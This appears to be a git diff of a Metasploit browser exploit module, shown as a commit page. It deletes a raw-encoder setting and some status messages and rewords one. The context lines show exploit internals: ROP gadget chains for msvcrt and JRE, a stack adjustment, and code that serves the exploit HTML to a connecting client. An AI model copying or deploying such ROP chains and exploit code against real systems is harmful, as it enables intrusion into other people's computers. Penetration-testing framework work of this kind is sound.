parent
19aaed05c9
commit
8ab783d3d9
|
@ -40,7 +40,6 @@ class Metasploit3 < Msf::Exploit::Remote
|
|||
],
|
||||
'Payload' =>
|
||||
{
|
||||
'EncoderType' => Msf::Encoder::Type::Raw,
|
||||
'StackAdjustment' => -3500
|
||||
},
|
||||
'DefaultOptions' =>
|
||||
|
@ -87,7 +86,6 @@ class Metasploit3 < Msf::Exploit::Remote
|
|||
# Both ROP chains generated by mona.py - See corelan.be
|
||||
case t['Rop']
|
||||
when :msvcrt
|
||||
print_status("Using msvcrt ROP")
|
||||
rop =
|
||||
[
|
||||
0x77c4e392, # POP EAX # RETN
|
||||
|
@ -111,7 +109,6 @@ class Metasploit3 < Msf::Exploit::Remote
|
|||
].pack("V*")
|
||||
|
||||
when :jre
|
||||
print_status("Using JRE ROP")
|
||||
rop =
|
||||
[
|
||||
0x7c37653d, # POP EAX # POP EDI # POP ESI # POP EBX # POP EBP # RETN
|
||||
|
@ -256,7 +253,7 @@ pluginspage="http://www.macromedia.com/go/getflashplayer">
|
|||
end
|
||||
|
||||
add_resource({'Path'=>'/test.mp4', 'Proc'=>proc}) rescue nil
|
||||
print_status("Sending html to #{cli.peerhost}:#{cli.peerport}...")
|
||||
print_status("#{cli.peerhost}:#{cli.peerport} Sending html...")
|
||||
send_response(cli, html, {'Content-Type'=>'text/html'})
|
||||
end
|
||||
|
||||
|
|
Loading…
Reference in New Issue